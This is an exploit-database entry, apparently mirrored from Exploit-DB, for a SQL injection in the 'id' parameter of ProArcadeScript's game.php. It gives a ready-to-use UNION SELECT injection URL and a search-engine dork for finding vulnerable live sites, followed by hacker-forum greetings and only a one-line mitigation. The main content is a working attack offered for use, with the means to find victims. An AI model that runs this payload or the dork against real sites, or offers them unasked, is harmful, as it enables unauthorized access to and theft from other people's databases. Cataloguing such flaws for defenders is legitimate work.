header-logo
Suggest Exploit
vendor:
Game
by:
Err0R
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Game
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

ProArcadeScript to Game (game) SQL Injection Vulnerability

An attacker can inject malicious SQL queries into the vulnerable parameter 'id' of the 'game.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An example of a malicious URL is http://server/games/game.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input to ensure that it conforms to the expected format, using whitelists to define all allowed inputs.
Source

Exploit-DB raw data:

# Software Link: proarcadescript.com
# Version: N/A

+/=============================================\+
# [+] Title : ProArcadeScript to Game (game) SQL Injection Vulnerability
# [+] site s.p : proarcadescript.com
# [+] Author : Err0R
# [+] Email : A5q(AT)HoTMaIL(dot)com
# [+] Site : www.sa-hacker.com/vb
+\=============================================/+

===============================================
DorK : intext:'Powered by ProArcadeScript ' inurl:'game.php?id='
===============================================
Exploit : You Come the Inject !
Demo :
http://server/games/game.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
============================================
.,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,.
Thanks to Allah
and
Good Luck
.,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,.
============================================
.,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,.
GreeTz To :
هتلر الخالدي , فتى الخفجي ,Pepsi,Wlhaan,Dr.DH,Osama
,,,,,,,,,,and All Muslims HaCkEr :P
.,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,..,’,.
============================================

Navigation

Suggest Exploit

Services By CQR